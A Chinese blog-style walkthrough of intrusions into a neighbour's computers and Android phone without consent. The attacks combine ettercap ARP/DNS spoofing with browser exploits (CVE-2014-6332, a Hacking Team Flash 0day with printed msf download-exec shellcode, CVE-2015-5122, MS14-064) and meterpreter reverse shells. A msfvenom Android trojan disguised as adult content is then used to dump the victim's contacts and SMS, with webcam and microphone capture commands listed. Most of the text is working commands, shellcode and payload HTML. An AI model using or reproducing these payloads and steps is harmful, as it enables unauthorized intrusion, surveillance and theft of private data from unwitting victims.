闲来无事,就想着写一篇内网渗透 大杂烩的文章,之前用莲花仙子账号写的两篇内网渗透文章分别为渗透测试某大型局域网、渗透测试某大型局域网网关防火墙,现如今号都被删了,哎!之前那个账号 10rank ,多么可惜啊!好了我们长话短说步入正题!
第一篇 利用 CVE-2014-6332 IE 全版本漏洞入侵 邻居 XP 电脑
首先开篇的是入侵邻居的电脑,邻居是个电脑盲,我所了解的情况是 2011 年买了电脑,几乎不怎么用,而且也不安装杀毒,估计补丁都不会打吧,就星期天用一下,正好今天周末,于是乎就开始下面的渗透过程。首先 net view (这里就不用 nmap 扫了)如图:
Zhongce 那台是我的,我们 ping 一下 ping BBLBX6GQE624W88 如图:
USER-20150620EZ 这个就不用 Ping 了是我的物理主机名, OK ,既然没打补丁,那就不用 nessus 扫描了,直接测试 CVE-2014-6332 IE 全版本漏洞 了,我们需要搭建一个 web 环境这里我用小旋风,先配置一个远控木马如图:
192.168.0.104 是我的物理 ip ,然后选择域名上线方式,生成木马丢到 web 跟木下,下面我们用 k8 飞刀工具来生成一个网马,点编码然后输入木马地址: http://192.168.0.104:89/server.exe
然后点右键 hacking-0day-ie 全版本漏洞,生成网马如图:
然后我们把网名名称改为: index.htm 然后丢到 kai linux /var/www/html/ 下面
我们的思路是通过 ettercap 来 dns+arp 攻击的方法来使 xp 种木马,对了记得执行 service apache2 start 命令启动 kali web 服务,下面我们来设置一下 etteracap 的 etter.dns 如图:
192.168.0.113 为 kali 的 ip 地址,然后 ettercap -G 启动图形化界面,点
然后选择 eth0
然后选择 hostlist ,如图:
前面我们已经 Ping 过了 xp 系统 ip 为 192.168.0.116 ,那么我们就把这个目标加到 Target1 ,然后把网关地址加到 Target2 ,然后在按照如图操作:
然后选择 Plugins ,选择
双击以后,然后开始
大概过了半分钟发现有主机上线,哈哈欺骗成功了
我们打开屏幕看看
他肯定是看视屏然后发现看不了了就打开 hao123 测试网络,哈哈我们不要搞什么破坏卸载掉木马。。。这样渗透测试邻居 XP 的渗透过程就完结了。。。
第二篇 flash 0day 之手工修改代码利用 msf 制作下载者实例入侵演示
利用到的工具:
Msf
Ettercap
Adobe Flash CS6
Hacking Team Flash 0day-可冲破 Chrome 沙盒 -Evil0X 源代码一份
下面我们就开始演示入侵,利用 msf 生成 shellcode, 首先打开 msf 执行 use windows/download_exec , show options
如图:
然后 set EXE system.exe, 再执行 set URL, 需要说明一下 URL 就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图 :
然后执行 generate -t dword 生成 shellcode ,如下:
复制代码到文本下便于我们一会编辑 flash exp ,如下:
0x0089e8 fc , 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
0x65747379, 0x78652e6d, 0x6beb0065, 0x505 fc 031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000
下面我们来修改 flash 0day exp ,需要修改三个文件,分别为:
先修改 ShellWin32.as ,部分源代码如图:
我们需要把标记处 [] 中的代码改成用 msf 生成的代码,修改后如下
然后保存, ShellWin64.as 的修改方法如上述,不再演示,下面我们来修改 myclass.as, 这里需要说明一下,因为此 exp 生成的利用程序,不能直接自动触发 flash 漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索 myclass 的某个字符 doc.addchild(btn); 如图:
换行在后面加一句 TryExpl(); 注意是 l 不是数字 1 ,然后如图:
然后点保存,下面我们来编译一下,打开
exp1.fla 然后点文件 - 发布,看看编译没错误
然后我们把生成的
exp1.swf 丢到 kailinux 的 /var/www/html 下:
然后把这段代码好好编辑一下
<!DOCTYPE html>
< html >
< head >
< meta http-equiv = "Content-Type" content = "text/html;
charset=utf-8" />
</ head >
< body >
< h2 > Please wait, the requested page is loading...</ h2 >
< br >
< OBJECT
classid = "clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH = "50" HEIGHT = "50" id = "4" >< PARAM NAME = movie
VALUE = "http://192.168.0.109/exp1.swf" ></ OBJECT >
</ body >
< script >
setTimeout( function () {
window .location.reload();
}, 10000 );
</ script >
</ html >
注意: 192.168.0.109 是 kali 的 ip 地址,这时候我们需要 service apache2 start 启动一下 web 服务,然后将上面的 html 保存为 index.htm 同样丢到 kali web 目录下,测试访问链接存在如图:
下面我们用 ettercap 欺骗如图:
下面我们随便访问个网站看看:
我靠我发现直接用 ettercap 欺骗物理机装了腾讯管家照样可以欺骗成功,木马上线如图:
我们看另一台
提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。不管他了,第二篇 over 。。。
第三篇 cve2015-5122 漏洞实例演示虚拟机
关于 cve2015-5122 这个漏洞,大家可以百度一下,是关于 flash 的漏洞,是 2015 年 flash 漏洞的第二发,今天我们就用这个漏洞来演示,开启 kai linux msfconsole 命令启动 msf 如图:
search cve-2015-5122 如图:
下面我们敲如下命令:
use exploit/multi/browser/adobe_flash_opaque_background_uaf
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.109
set URIPATH / /* 根目录 */
set SRVHOST 192.168.0.109 //192.168.0.109 为 kaili ip 地址
set SRVPORT 80 /*80 端口 */ 使用 80 端口时要保证 apache 为停止状态用 service apache2 stop 命令停止否则会提示端口被占用
然后 show options 如图:
一切都设置好了,执行 exploit 。下面我们进 etc/ettercap 目录下设置 etc.dns 如图:
然后 ettercap -G 命令打开 ettercap ,我们要攻击的主机 ip 是 192.168.0 。 115
Ettercap 过程第一篇里已经演示,这里不在详细写了。。。执行完 ettercap 以后我们观察一下 msf
成功了,这时候我们断开 ettercap ,如图:
Screenshot 如图:
第四篇 MS14-064 漏洞测试入侵 win7
我发现 msf 下的 exp 只能针对带有 powershell 的机器进行攻击,我们用如下方法来搞演示
开启 msf 执行命令 use exploits/windows/browser/ms14_064_ole_code_execution 如图:
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
set AllowPowershellPrompt true
Set LHOST 192.168.0.109
set SRVHOST 192.168.0.109
Set uripath share
Set srvport 80
show options
下面我们来访问本地地址成功如图:
第五篇 msf+ettercap 入侵邻居安卓手机
首先启动 msf
先用 kali 生成一个安卓木马,如下命令:
Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk
为了能让对方下载以后安装我这里将马的名字命名为 ribenav.apk, 哈哈邻居可是个 “ 大色鬼 ” ,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
然后进入 msf
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.0.109 //ip 为 kaili 的 ip
set LPORT 44444 // 端口一定要与前面生成的木马的端口一致
Exploit
下面我们开启 ettercap -G
我物理 IP 为
别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,
下面我们来设置一下
在开启欺骗之前我们先把生成的 apk 马丢到 kaili var/www/html 下,并创建一个 index.htm 文件内容为: <iframe src=http://192.168.0.109/ribenav.apk></iframe>, 因为 apk 文件嘛要想直接提示下载,用 iframe 语句就 OK 了
我们试着访问一下看看,别出什么错,访问正常。。
下面我们开始攻击
大概过了 5 分钟多,发现反弹成功了,哈哈老大叔还不错一看日本 AV 哈哈估计上劲就安装了。。。
执行命令
dump_contacts -- 》这个是导出电话
dump_sms --》这个是导出信息
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream   lay a video stream from the specified webcam
生成电话薄 txt
我们打开看一下电话薄
打开短信看一下
我们同时欺骗成 DroidJack 木马,使用方法如图:
切记在前面生成完马以后记得在这里选择开关为 on ,并且对应前面生成马的时候的端口否则上线不了
文件管理如图:
短信管理如图:
查看安装 app 如图:
查看浏览过的网页如图: